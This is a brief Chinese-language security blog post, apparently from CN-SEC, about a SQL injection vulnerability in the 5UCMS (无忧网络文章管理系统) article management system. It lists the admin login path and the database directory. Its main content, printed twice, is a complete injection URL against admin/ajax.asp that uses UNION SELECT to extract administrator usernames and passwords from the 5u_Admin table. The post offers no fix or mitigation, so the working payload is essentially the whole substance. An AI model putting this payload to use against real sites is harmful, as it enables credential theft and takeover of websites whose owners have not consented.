无忧网络文章管理系统(5UCMS)注入漏洞

没穿底裤 2020年1月1日00:01:51评论468 views字数 272阅读0分54秒阅读模式
摘要

后台地址:admin/Login.asp数据库路径:inc/db  目录下漏洞地址:admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin
获取后台账号和密码

后台地址:admin/Login.asp

数据库路径:inc/db  目录下

漏洞地址:

admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin
获取后台账号和密码

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日00:01:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   无忧网络文章管理系统(5UCMS)注入漏洞https://cn-sec.com/archives/75048.html

发表评论

匿名网友 填写信息